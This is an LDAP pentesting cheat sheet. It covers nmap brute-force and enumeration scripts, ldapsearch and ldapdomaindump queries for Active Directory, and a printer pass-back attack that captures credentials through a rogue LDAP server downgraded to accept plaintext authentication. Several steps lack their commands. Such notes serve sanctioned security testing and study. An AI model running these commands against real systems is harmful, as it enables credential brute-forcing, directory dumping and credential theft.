LDAP (Lightweight Directory Access Protocol) Pentesting
LDAP is a standard protocol designed to maintain and access "directory services" within a network. Default ports are 389 (LDAP), 636 (LDAPS), 3268 (LDAP connection to Global Catalog), 3269 (LDAP connection to Global Catalog over SSL).
Enumeration
# Nmap
nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 <target-ip>
nmap --script ldap-search -p 389 <target-ip>
nmap --script ldap-* -p 389 <target-ip>
nmap --script "ldap* and not brute" -p 389 <target-ip>
# NetExec
# -k: Use Kerberos authentication
netexec ldap <target-ip> -u usernames.txt -p '' -k
# --trusted-for-delegation: Enumerate computers and users with the flag `TRUSTED_FOR_DELEGATION`
# reference: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties#property-flag-descriptions
netexec ldap <target-ip> -u username -p password --trusted-for-delegation
Search LDAP
Belows are defined in LDAP.
- cn - Common Name
- dc - Domain Component
- ou - Organizational Unit
# -x: Simple authentication
# -b: base dn for search
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com"
ldapsearch -x -H ldaps://10.0.0.1:636 -b "dc=example,dc=com"
# As administrator
# -D: bind DN
# -w: bind password
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -w password
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -W
# Search sAMAccountName
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" "sAMAccountName"
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" "sAMAccountName" | grep sAMAccountName
# Get information
ldapsearch -x -H ldap://10.0.0.1 -b "cn=sample,cn=Users,dc=example,dc=com" -w 'password' "(objectclass=*)" -D "example\\name"
Dump Active Directory Information
If you have the credential, you can get the Active Directory information via LDAP.
# --no-html: Disable html output
# --no-grep: Disable greppable output
# -o: Output dir
ldapdomaindump -u 'DOMAIN\username' -p password <target-ip> --no-html --no-grep -o dumped
Connect
AD CS (Active Directory Certificate Services)
LAPS (Local Administrator Password Solution)
Pass-Back Attack
Attack against the network devices such as printers.
For example, access http://printer.sub.example.com/settings.aspx
Open a listener for connecting back to your local machine.
In your browser, test LDAP settings where you input username and password.
Host Rogue LDAP Server
If we cannot connect back in local machine by netcat, we need to create a rogue LDAP server.
Install the dependencies at first.
Configure your own rogue LDAP server by executing the following command.
sudo dpkg-reconfigure -p low slapd
# ---------------------------------------------------
# in configuration dialog
1. Omit OpenLDAP server configuration: No
2. DNS domain name: <target-domain>
3. Organization name: <target-domain>
4. Administrator password: <arbitrary-password>
5. Database backend to use: MDB
6. Do you want the database to be removed when slapd is purged?: No
7. Move old database?: Yes
We need to make your rogue LDAP server to be vulnerable by downgrading the supported authentication mechanism.
Create the config file named "config.ldif".
Now we can use the config file to patch the LDAP server.
# -Y: SASL mechanism
# -H: URI
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./config.ldif
sudo service slapd restart
We can verify that the rogue LDAP server’s configuration has been applied:
For capturing the credentials, run the following command.
In browser, test the printer settings and capture the credentials via tcpdump.